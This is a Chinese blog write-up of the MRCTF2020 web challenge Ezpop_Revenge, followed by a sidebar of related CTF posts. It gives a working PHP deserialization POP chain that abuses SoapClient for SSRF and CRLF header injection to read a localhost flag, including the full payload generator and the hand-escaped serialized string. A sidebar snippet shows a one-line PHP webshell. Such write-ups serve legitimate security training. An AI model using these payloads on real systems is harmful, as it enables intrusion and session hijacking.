MRCTF2020 web Ezpop_Revenge 简单记录

最新推荐文章于 2024-08-05 10:20:28 发布
最新推荐文章于 2024-08-05 10:20:28 发布
阅读量3k 收藏 4
点赞数 4
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/105215741
版权

题目介绍

首先这是一个typecho的框架
然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~

解题过程

首先我们找到输入点

在这里插入图片描述
在插件中,我们发现action()的代码
这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~
在这里插入图片描述
在这里插入图片描述

Helper::addRoute("page_admin_action","/page_admin","HelloWorld_Plugin",'action');

这句代码的意思就是访问/page_admin的时候,会自动加载HelloWorld_Plugin类,而且会自动调用action函数,所以我们输入点的路由为/page_admin

寻找pop链

在根目录下有flag文件
在这里插入图片描述
很明显的ssrf,结合输入点的反序列化,我们直接想到soapssrf
当访问后,会自动把flag写进访问的session

usr下面的Plugin.php中有一个类
在这里插入图片描述
我们跟进Typecho_Db
在这里插入图片描述
然后在Typecho_Db__construct中发现字符串拼接,这个时候我们就知道肯定实调用某个类的__tostring,因为$adapterName我们可控
所以我们直接搜索__tostring
在这里插入图片描述
然后跟踪到Query.php__tostring
假如Typecho_Db::SELECT(静态值)的值为SELECT,则跟进$this->_adapter
我们发现这个值我们也是可控的,这个时候我们控制_adapter为soap类就可以了~~
在这里插入图片描述

这是时候梳理一下pop链
首先时/usr下的Plugins.php反序列化调用HelloWorld_DB触发Typecho_Db类,并且可以控制其中的$adapterName
$adapterName拼接到字符串中,触发__tostring,所以这个时候我们使得$adapterNameQuery.php中的Typecho_Db_Query类,并且控制私有变量$_adapter为soap类来本地访问flag.php
在这里插入图片描述
这个时候再访问soap的parseSelect方法,但是此方法并不存在,所以就会触发soap的__call方法来打到本地访问的目的

payload:

<?php

class Typecho_Db_Query
{
    private $_sqlPreBuild;
    private $_adapter;

    public function __construct()
    {
       $target = 'http://127.0.0.1/flag.php';
		$headers = array(
		'X-Forwarded-For: 127.0.0.1',
		'Cookie: PHPSESSID=a8vkg6l5j5sesvqan5q5s4obr1'
		);
		$b = new SoapClient(null,array('location' => $target,'user_agent'=>'HyyMbb^^'.join('^^',$headers),'uri'      => "aaab"));
        $this->_sqlPreBuild =array("action"=>"SELECT");
        $this->_adapter = $b;
    }
}


class HelloWorld_DB
{
    private $coincidence;

    public function __construct()
    {
        $this->coincidence = ["hello" => new Typecho_Db_Query()];
    }
}

$a = new HelloWorld_DB();
$aaa = serialize($a);

这个时候先生成序列化的值,然后再做一些小处理
我们都知道私有变量类名的前后都有%00,但是某些特定版本的情况下,这样也会出错
这个时候我们需要将s改为S,并添加\00
如同这个样子

$aaa = 'O:13:"HelloWorld_DB":1:{S:26:"\00HelloWorld_DB\00coincidence";a:1:{s:5:"hello";O:16:"Typecho_Db_Query":2:{S:30:"\00Typecho_Db_Query\00_sqlPreBuild";a:1:{s:6:"action";s:6:"SELECT";}S:26:"\00Typecho_Db_Query\00_adapter";O:10:"SoapClient":5:{s:3:"uri";s:4:"aaab";s:8:"location";s:25:"http://127.0.0.1/flag.php";s:15:"_stream_context";i:0;s:11:"_user_agent";s:79:"wupco^^X-Forwarded-For: 127.0.0.1^^Cookie: PHPSESSID=a8vkg6l5j5sesvqan5q5s4obr1";s:13:"_soap_version";i:1;}}}}';

然后再添加\r\n,base64编码

$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo base64_encode($aaa);

我们soap访问的PHPSESSID的值为a8vkg6l5j5sesvqan5q5s4obr1

这个时候访问/page_admin页面
在这里插入图片描述
然后更换PHPSESSID
在这里插入图片描述
得到flag

写在最后,再说一下为啥要更换s,和添加\00,而不是直接编码

都知道private属性会在反序列化的生成一个标志性的%00,关于这个坑点p神是这么说的

  • PHP序列化的时候privateprotected变量会引入不可见字符\x00,输出和复制的时候可能会遗失这些信息,导致反序列化的时候出错。
  • private属性序列化的时候会引入两个\x00,注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到,甚至导致截断,如图1,url编码后就可以看得很清楚了。
  • 同理,protected属性会引入\x00*\x00
  • 此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。比如s:5:”A<null_byte>B“;̀ -> S:5:”A\00B\09\0D”;
HyyMbb
关注
专栏目录
rocker-s_revenge:Местьрокера
03-28
标题"rocker-s_revenge:Местьрокера"可能指的是一个用C语言编写的游戏或者项目,其中"rocker-s_revenge"可能是游戏或项目的名称,而"Местьрокера"在俄语中意为"摇滚歌手的复仇",暗示这可能是...
dynablaster_revenge:爆破机复仇
05-31
Dynablaster Revenge是1991年由Hudson Soft发布的Dynablaster游戏的翻版。此翻版的目的是在保持某些原始玩法的同时尽可能增加原始功能,同时增加一些新功能,如联网多人游戏和实时3D渲染。 如果您还不熟悉最初的...
[MRCTF2020]Ezpop_Revenge
qq_45691294的博客
10-17 1413
题目打开是个typecho博客,www.zip泄露,下载得到源码 看到flag.php可能是一个SSRF的题 <?php if(!isset($_SESSION)) session_start(); if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ $_SESSION['flag']= "MRCTF{******}"; }else echo "我扌your problem?\nonly localhost can get flag!"; ?> 因为是一
WEB新手之serialize’s revenge
weixin_33724570的博客
03-24 94
  最后一道题。   这道题提示比较少,一点也不友好。F12也没有什么线索。无奈之下用御剑扫下后台,发现了一个叫robots的txt文件。   打开robots.txt文件,可以得到一段代码,如下图所示。   审查代码,会发现这里有一个文件包含漏洞,我们可以利用filter以base64编码的方式读出backdoor.php。于是在url加上: ?text=p...
[MRCTF2020]Ezpop1
最新发布
kw741951的博客
08-05 1096
/这里urlencode是为了防止 protected 对象对结果造成影响。调用invoke魔术方法需要将对象当做一个函数来使用,这样invoke方法就会自动调用。,然后成功调用invoke魔术方法就可以读出flag。果我们把modifiy对象的var改为。一看base64编码。
[MRCTF2020]Ezpop
qq_43801002的博客
05-14 709
题目: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; pub
web buuctf [MRCTF2020]Ezpop1
weixin_44214568的博客
04-07 590
知识点:1.魔法函数 2.文件包含漏洞 1.开题,php代码审计 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cr...
medusas_revenge:美杜莎会在迷宫中找到自己的出路吗?
03-19
美杜莎的复仇–第一部分 这是我从大流行2年级开始的一个项目,它使我保持理智(或者根据自己的观点,使我更接近疯狂的边缘),并且只是为了好玩。 在其中,您扮演美杜莎(Medusa),希腊神话中的恶棍,在米诺斯...
FTP-Revenge.rar_Same Same
09-23
Same as the name, use for Ftp revenge
BUUCTF WEB Ezpop
qq_41696858的博客
12-30 599
继续简单粗暴的源码审计,看见这么多魔法方法,就知道反序列化没跑了 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier {
[MRCTF2020] - Web
qtL0ng的博客
07-01 1084
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
BMZCTF-WEB-simple_pop
qq_24033605的博客
05-24 294
simple_pop php代码审计: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")){ echo "<br><h1>".file_get_contents($text,'r')."&
[MRCTF2020]Ezaudit
Sk1y的博客
02-08 931
[MRCTF2020]Ezaudit 文章目录[MRCTF2020]Ezaudit伪随机数php_mt_rand() 知识点:伪随机数mt_rand() 源码泄露:www.zip 下载后,是个index.php <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $pa
BUUCTF [MRCTF2020]Ezpop
qq_52671379的博客
04-01 276
BUUCTF [MRCTF2020]Ezpop
BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9235
BUUCTF之[MRCTF2020]你传你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。 不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2467
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
[MRCTF2020]套娃 字符串解析特性bypass及ascii移位
qq_54929891的博客
03-22 559
<!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值